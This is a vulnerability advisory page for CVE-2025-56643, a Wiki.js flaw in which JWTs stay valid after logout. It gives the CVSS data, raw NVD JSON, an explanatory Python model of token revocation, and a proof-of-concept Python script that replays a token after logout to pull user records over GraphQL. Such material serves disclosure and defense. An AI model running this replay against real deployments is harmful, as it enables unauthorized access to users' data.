Security Vulnerability Report
CVE-2025-56643 CVSS 9.1 CRITICAL

CVE-2025-56643

Published: 2025-11-18 18:16:08
Last Modified: 2025-12-31 02:06:52

Description

Requarks Wiki.js 2.5.307 does not properly revoke or invalidate active JWT tokens when a user logs out. As a result, previously issued tokens remain valid and can be reused to access the system, even after logout. This behavior affects session integrity and may allow unauthorized access if a token is compromised. The issue is present in the authentication resolver logic and affects both the GraphQL endpoint and the logout mechanism.
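A minimal model of the behaviour described above, next to one common mitigation, as an added example (it is not Wiki.js code and not taken from the advisory). A verifier that checks only signature and expiry keeps accepting a token after logout, while a server-side denylist keyed on the token's `jti` rejects it. The signing key, the function names and the `RevocationList` class are assumptions made for the illustration.

```python
import base64, hashlib, hmac, json, uuid

SECRET = b"constructed-demo-key"  # constructed key, for this example only

def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _sign(signing_input: str) -> bytes:
    return hmac.new(SECRET, signing_input.encode(), hashlib.sha256).digest()

def issue_token(user: str, now: int, ttl: int = 1800) -> str:
    """Issue an HS256 JWT carrying a unique jti so it can be revoked individually."""
    header = _b64(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    claims = {"sub": user, "jti": uuid.uuid4().hex, "iat": now, "exp": now + ttl}
    signing_input = header + "." + _b64(json.dumps(claims).encode())
    return signing_input + "." + _b64(_sign(signing_input))

def verify_stateless(token: str, now: int):
    """Signature and expiry only (algorithm pinned to HS256); logout cannot affect it."""
    try:
        header, payload, sig = token.split(".")
        if not hmac.compare_digest(_sign(header + "." + payload), _unb64(sig)):
            return None
        claims = json.loads(_unb64(payload))
    except ValueError:  # wrong part count, bad base64 or bad JSON
        return None
    return claims if isinstance(claims, dict) and claims.get("exp", 0) > now else None

class RevocationList:
    """Server-side denylist of logged-out token ids, kept until each token's own expiry."""
    def __init__(self):
        self._revoked = {}  # jti -> exp

    def logout(self, token: str, now: int) -> bool:
        claims = verify_stateless(token, now)
        if claims is None or "jti" not in claims:
            return False
        self._revoked[claims["jti"]] = claims["exp"]
        return True

    def verify(self, token: str, now: int):
        # Drop entries whose tokens have expired anyway, so the list stays bounded.
        self._revoked = {j: e for j, e in self._revoked.items() if e > now}
        claims = verify_stateless(token, now)
        if claims is None or claims.get("jti") in self._revoked:
            return None
        return claims
```

In a multi-node deployment the denylist has to live in shared storage so that every node sees a logout.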

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:requarks:wiki.js:2.5.307:*:*:*:*:*:*:* - VULNERABLE
Requarks Wiki.js 2.5.307

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# Target Wiki.js instance
TARGET_URL = "http://target-server:3000"

# Step 1: Normal login to get JWT token
login_url = f"{TARGET_URL}/login"
login_data = {
    "email": "[email protected]",
    "password": "password123"
}

response = requests.post(login_url, json=login_data)
if response.status_code == 200:
    jwt_token = response.json().get("token")
    print(f"[+] Obtained JWT token: {jwt_token}")
else:
    print("[-] Login failed")
    exit(1)

# Step 2: User logs out (token remains valid)
# Simulating logout - token is not invalidated on server side
print("[*] Target user logs out...")

# Step 3: Use the same token after logout (exploit)
graphql_url = f"{TARGET_URL}/graphql"
headers = {
    "Authorization": f"Bearer {jwt_token}",
    "Content-Type": "application/json"
}

# GraphQL query to verify token still works
query = {"query": "{ users { id email name } }"}

response = requests.post(graphql_url, headers=headers, json=query)
if response.status_code == 200:
    result = response.json()
    if "data" in result:
        print(f"[+] Exploit successful! Token still valid after logout")
        print(f"[+] Retrieved user data: {json.dumps(result, indent=2)}")
    else:
        print(f"[-] Unexpected response: {result}")
else:
    print(f"[-] Request failed with status: {response.status_code}")
```

References

https://github.com/0xBS0D27/CVE-2025-56643 (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56643", "sourceIdentifier": "[email protected]", "published": "2025-11-18T18:16:07.647", "lastModified": "2025-12-31T02:06:51.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Requarks Wiki.js 2.5.307 does not properly revoke or invalidate active JWT tokens when a user logs out. As a result, previously issued tokens remain valid and can be reused to access the system, even after logout. This behavior affects session integrity and may allow unauthorized access if a token is compromised. The issue is present in the authentication resolver logic and affects both the GraphQL endpoint and the logout mechanism."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:requarks:wiki.js:2.5.307:*:*:*:*:*:*:*", "matchCriteriaId": "9B79896A-E767-4CFF-A485-4F1332AA5AF1"}]}]}], "references": [{"url": "https://github.com/0xBS0D27/CVE-2025-56643", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}